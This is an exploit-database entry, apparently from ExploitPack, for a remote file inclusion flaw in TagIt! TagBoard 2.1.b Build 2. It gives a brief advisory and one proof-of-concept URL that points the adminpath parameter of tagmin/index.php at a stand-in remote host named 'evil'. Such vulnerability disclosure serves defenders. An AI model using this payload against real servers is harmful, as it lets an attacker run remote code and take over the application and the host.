Tagit! Tagit2b 2.1.B Build 2 - tagminindex.php?adminpath Remote File Inclusion

2007-02-12T00:00:00
ID EXPLOITPACK:DCF4888AF1E407922C0133535884BABD
Type exploitpack
Reporter K-159
Modified 2007-02-12T00:00:00

Description

Tagit! Tagit2b 2.1.B Build 2 - tagminindex.php?adminpath Remote File Inclusion

                                        
                                            source: https://www.securityfocus.com/bid/22518/info
           
TagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
           
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
           
TagBoard 2.1.b Build 2 and prior versions are vulnerable. 

http://www.example.com/[TagIt_path]/tagmin/index.php?adminpath=http://example2.com/evil?